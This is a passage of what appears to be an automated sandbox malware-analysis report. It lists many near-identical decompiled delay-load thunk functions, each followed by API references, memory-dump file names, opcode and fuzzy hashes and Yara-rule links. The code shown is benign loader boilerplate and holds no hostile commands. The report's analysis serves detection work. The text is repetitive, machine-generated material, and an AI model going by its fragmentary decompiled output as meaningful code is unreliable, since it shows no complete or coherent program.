				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec2150); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0d1e5973ab6de86b26be5f2de79a7dbfe5055e8388601adf3028666a615b8601
Instruction ID: e6554387fcacfdab28434160a38624f21b826e2d5b1c85628c5b91e10f5f8220
Opcode Fuzzy Hash: 0d1e5973ab6de86b26be5f2de79a7dbfe5055e8388601adf3028666a615b8601
Instruction Fuzzy Hash: 8AB0128535D1416C310461947E03D36015CC8C8B10331F86EF10AF12C1D8401C071031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DB69 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DB69() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec2164); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c8d6a7a9f7ae5df2ab1d3e401e55e839f89cd34fe7a937f2bee415a04807dac9
Instruction ID: 6fb92a02a523b68897644c3e51744180880e5ebb732cdbd57e44847df8907d64
Opcode Fuzzy Hash: c8d6a7a9f7ae5df2ab1d3e401e55e839f89cd34fe7a937f2bee415a04807dac9
Instruction Fuzzy Hash: 30B0128935D3416C310861457F43D3F015CC8C4B10331F41EF109F11C2D4811C031031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DB73 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DB73() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec2160); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1110e58290030d018547ea86b986f2d79c08ed82de3e30101a24422645b8ad2e
Instruction ID: 49967814473ce5ca2475207a2bc6f4579e7ddc62c21d70f028412f140c935a72
Opcode Fuzzy Hash: 1110e58290030d018547ea86b986f2d79c08ed82de3e30101a24422645b8ad2e
Instruction Fuzzy Hash: E6B012C935D2416C310461447E43D3F015CD8C4B10331F41EF109F11C2D8401C021131

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DB7D Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DB7D() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec215c); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4d93432644237632e2b2987ac4f472cec3653905d9b5cf08b38ddd4fceb9d652
Instruction ID: b43668fd21a62685715a3129f2d9ad932d0fef345199cc3c5c0013f28aa657a1
Opcode Fuzzy Hash: 4d93432644237632e2b2987ac4f472cec3653905d9b5cf08b38ddd4fceb9d652
Instruction Fuzzy Hash: 6FB0128535D2416C310461547E03D36015CC8C4B10331F46FF509F12C1D4401C071031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DB4E Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DB4E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec216c); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ea215e0c8cb5640fc3e47506b94446815fb7d392045c2b04a59cc71546f8ebe1
Instruction ID: 6bc42802d203ed51681bd0607dae4dc077595cb2aabc9899d43cf73ec867acb4
Opcode Fuzzy Hash: ea215e0c8cb5640fc3e47506b94446815fb7d392045c2b04a59cc71546f8ebe1
Instruction Fuzzy Hash: 6EB0128939D3417C310421407E4BC3F021CC8C0B11331F41EF605F00C2D4401C061031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7E4C1 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7E4C1() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bea4, 0xec2034); // executed
				goto __eax;
			}

0x00e7e4cb
0x00e7e4d3
0x00e7e4da

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7E4D3

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 90b6a3d60d5616a21984c96afd64b946029cc45ee967acc008e0c5d169283888
Instruction ID: 8de7741bcbd3ff602c2d58871bdd3c881403a05f708a9004a3b2ce9e804f4bce
Opcode Fuzzy Hash: 90b6a3d60d5616a21984c96afd64b946029cc45ee967acc008e0c5d169283888
Instruction Fuzzy Hash: 42B0128135A101BD320851503F03C76011CC4C4B50330FC5FB208F4251A6811C030032

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DC31 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DC31() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec2114); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3f0302a703f05cfa309929d4dfc87ec460d8641b8986a5dfca5902a1481c4794
Instruction ID: 609952c9047ac429ff49573d58fb9a92caa0724a75877975c42ecb960bdf661c
Opcode Fuzzy Hash: 3f0302a703f05cfa309929d4dfc87ec460d8641b8986a5dfca5902a1481c4794
Instruction Fuzzy Hash: 68B0128535D1416C31086145BF03D36015CC8C4F10331F41EF10AF11C1D4811C032031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DDC8 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DDC8() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bde4, 0xec2060); // executed
				goto __eax;
			}

0x00e7dd71
0x00e7dd79
0x00e7dd80

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DD79

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 79a7fce0374f660356a1912cbfa2d1a551f46a8a8cad6fb3b79eb602bfe11931
Instruction ID: 2421ac982c02d795e7a4d88f1de600f38133aae2cc0684d7ec968da58c08fcb3
Opcode Fuzzy Hash: 79a7fce0374f660356a1912cbfa2d1a551f46a8a8cad6fb3b79eb602bfe11931
Instruction Fuzzy Hash: DEB012C539C2016C310461457E43E3E015CD4C4B30330F65FB50CF0141D8401C021131

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DDA0 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DDA0() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bde4, 0xec2050); // executed
				goto __eax;
			}

0x00e7dd71
0x00e7dd79
0x00e7dd80

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DD79

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 34fb4554b8e35e966322e5d0fee76e38a8f985ae66919e2a929a937086082800
Instruction ID: d5dd1a053a4e37ed3e90a2313865de582295a5e2865f8abfed3de33999401d58
Opcode Fuzzy Hash: 34fb4554b8e35e966322e5d0fee76e38a8f985ae66919e2a929a937086082800
Instruction Fuzzy Hash: 56B012C535C1016C310461557E03E3E015CC4C8B30330FA6FB20DF0141D8401C070031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DD96 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DD96() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bde4, 0xec204c); // executed
				goto __eax;
			}

0x00e7dd71
0x00e7dd79
0x00e7dd80

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DD79

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0bc013b709931ddba659c8204f18257a2c635d6dcfe219ee084b8377d0c15c54
Instruction ID: 76cc9f705449efe5a38d137276b954242f9df9f9cbbb2208f57d6920abdadabd
Opcode Fuzzy Hash: 0bc013b709931ddba659c8204f18257a2c635d6dcfe219ee084b8377d0c15c54
Instruction Fuzzy Hash: F8B012D635C201AC310461457E03D3A015CC4C4B30330F65FB90CF0151D4441C020031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DEE1 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DEE1() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9be44, 0xec2078); // executed
				goto __eax;
			}

0x00e7de94
0x00e7de9c
0x00e7dea3

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DE9C

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3c949a362f50e13c4360166b3ad3dccd03362cb0b60e0a04b6e7c170584c7490
Instruction ID: 244211df46093c5f926c583665a8c7379de81118093b6c4c014b8fcb944697f3
Opcode Fuzzy Hash: 3c949a362f50e13c4360166b3ad3dccd03362cb0b60e0a04b6e7c170584c7490
Instruction Fuzzy Hash: 99B0128135D2016D360451447E07D76016CC4C4F10330F61FB108F8241D9401C461136

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DEEB Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DEEB() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9be64, 0xec217c); // executed
				goto __eax;
			}

0x00e7def5
0x00e7defd
0x00e7df04

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DEFD

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 18b6037584dbd057a8fa1dd9c2cc311d36f1946407042b6e3cdfc08436670f23
Instruction ID: 624690a1184246e1a1d059ad7ad798ad3ae71b0a23df78fa4ab011459373b172
Opcode Fuzzy Hash: 18b6037584dbd057a8fa1dd9c2cc311d36f1946407042b6e3cdfc08436670f23
Instruction Fuzzy Hash: ACB0128176D302BD35082140BE07C77013CC4D4F10331F51EB604F4051EA402C020031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DEC3 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DEC3() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9be44, 0xec2084); // executed
				goto __eax;
			}

0x00e7de94
0x00e7de9c
0x00e7dea3

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DE9C

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: acd8cc02d7c1b8ec6baefe19eb2e9d8348f2bb6bf568d1bcf89b0bda6b7e9b97
Instruction ID: 08e386fb453abf31587d0781695c7fb201cccce4a165f6c4777c38dfba6f50e6
Opcode Fuzzy Hash: acd8cc02d7c1b8ec6baefe19eb2e9d8348f2bb6bf568d1bcf89b0bda6b7e9b97
Instruction Fuzzy Hash: 95B0128135D2426D310851443F07D77026CC4C4B10330F41FB208F8241D9C11C030132

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DED7 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DED7() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9be44, 0xec207c); // executed
				goto __eax;
			}

0x00e7de94
0x00e7de9c
0x00e7dea3

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DE9C

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8d30d358fc02a4fb0f5867fe40a4ef6d6e2cc52c30b8d40d54804c5c1a282aad
Instruction ID: a67e67d2a75c67530a7fb7765b838fa7e4409051cbe345965d2349952f22996b
Opcode Fuzzy Hash: 8d30d358fc02a4fb0f5867fe40a4ef6d6e2cc52c30b8d40d54804c5c1a282aad
Instruction Fuzzy Hash: 32B0128135D201AD350451447E07D76026CC4C8F10331F51FB508F8241D9401C020136

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DEA5 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DEA5() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
